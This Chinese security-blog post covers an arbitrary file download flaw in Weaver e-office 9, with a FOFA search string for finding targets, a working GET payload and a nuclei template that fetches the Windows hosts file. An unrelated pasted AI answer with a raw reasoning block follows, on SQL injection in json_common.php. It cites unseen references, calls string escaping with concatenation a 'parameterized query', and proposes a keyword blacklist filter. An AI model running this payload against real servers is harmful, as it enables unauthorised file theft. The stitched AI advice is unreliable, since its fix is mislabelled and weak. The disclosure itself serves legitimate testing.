泛微e-office download.php存在任意文件下载

0x01 应用介绍

泛微e-office系统是标准、易用、快速部署上线的专业协同OA软件,国内协同OA办公领域领导品牌,致力于为企业用户提供专业OA办公系统、移动OA应用等协同OA整体解决方案

0x02 影响版本及语法特征

泛微e-offcie9
fofa:app=”泛微-EOffice” && body=”您的浏览器处于弹出窗口阻止模式!建议您关闭”

0x03 漏洞复现

payload:/general/file_folder/file_new/neworedit/download.php?filename=hosts&dir=C:\Windows\System32\drivers\etc\
直接使用get请求拼接该payload即可下载目标主机hosts文件

图片

下载完成后打开文件查看

图片


下载服务器文件复现成功

nuclei

id: fanwei-E-Office-file-read
info:
  name: fanwei-E-Office-file-read
  author: fanwei-E-Office-file-read
  severity: critical
  tags: fanwei

http:
  - raw:
    - |
        GET /general/file_folder/file_new/neworedit/download.php?filename=hosts&dir=C:\Windows\System32\drivers\etc\ HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

    matchers-condition: and
    matchers:
      - type: word
        words:
          - "127.0.0.1"
      - type: status
        status:
          - 200

图片

修复建议

使用最新版本的应用

限制漏洞路径的访问

 声明:⽂中所涉及的技术、思路和⼯具仅供以安全为⽬的的学习交流使⽤,任何⼈不得将其⽤于⾮法⽤途以及盈利等⽬的,否则后果⾃⾏承担。所有渗透都需获取授权

免费领取安全学习资料包!


渗透工具

技术文档、书籍

面试题

帮助你在面试中脱颖而出

视频

基础到进阶

环境搭建、HTML,PHP,MySQL基础学习,信息收集,SQL注入,XSS,CSRF,暴力破解等等

应急响应笔记

学习路线

<think>好的,我现在需要处理用户关于E-Office中_common.php文件存在SQL注入漏洞的查询。首先,我要确认用户的需求:他们想知道修复方案和受影响的版本。根据用户提供的引用内容,我需要从这些引用中提取相关信息。 首先,查看用户提供的引用内容。引用[2]提到E-Office的多个接口存在SQL注入漏洞,包括json_common.php、flow_xml.php等,但用户询问的是_common.php,这里可能是一个笔误或者具体文件名的不同。引用[3]和[4]提到了json_common.php漏洞,可能用户提到的_common.php是相关文件。因此,需要假设用户可能指的是json_common.php,或者可能是其他类似的接口文件。 接下来,需要确定影响版本。引用[2]和[4]中提到影响范围,但具体版本号没有明确给出。通常,漏洞公告可能不会列出所有受影响版本,但可以建议用户检查是否在使用未修复的旧版本。引用[3]提到了检测脚本,可能适用于特定版本。 关于修复方案,引用[1]提到了整改意见,可能包括补丁更新、输入过滤等。引用[2]和[4]没有具体说明修复方法,但通常厂商会发布补丁。此外,参考通用SQL注入修复方法,如参数化查询、输入验证等,可以建议用户实施这些措施。 还需要注意用户提供的引用[5]是PHP代码审计的基础知识,可能帮助理解漏洞成因,但可能不直接提供修复方案。需要综合这些信息,给出合理的回答,同时指出引用来源。 最后,需要生成相关问题,帮助用户深入理解。例如,如何检测漏洞、其他相关漏洞、修复后的验证方法等。</think>关于E-Office系统中`_common.php`文件(推测应为`json_common.php`相关接口)存在的SQL注入漏洞,结合公开漏洞信息整理如下: ### 一、漏洞影响版本 根据引用[2][3][4],该漏洞影响E-Office系统中**未修复该漏洞的历史版本**。具体版本号需联系官方确认,但存在以下特征: - 使用未经过安全审计的旧版代码架构 - 未对`json_common.php`等接口实现输入过滤 - 未部署最新的安全补丁包 ### 二、漏洞修复方案 1. **官方补丁升级** 立即联系技术支持获取最新安全补丁包,更新受影响的组件(引用[1]中提到的整改建议)。 2. **代码层修复** 针对接口参数进行过滤加固: ```php // 示例:参数化查询改造(引用[5]) $param = mysqli_real_escape_string($conn, $_POST['user_input']); $sql = "SELECT * FROM users WHERE id = '{$param}'"; ``` 3. **输入过滤增强** 在`json_common.php`等漏洞接口处添加: ```php if (preg_match('/select|union|sleep|benchmark/i', $_REQUEST['param'])) { die("非法请求"); } ``` 4. **权限控制** 关闭接口的匿名访问权限,强制要求身份认证(引用[2]中强调未授权访问问题)。 ### 三、漏洞验证方法 可使用引用[3]提到的检测脚本进行安全评估: ```bash python json_commonSQLcheck.py -u http://目标地址:端口 ```
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值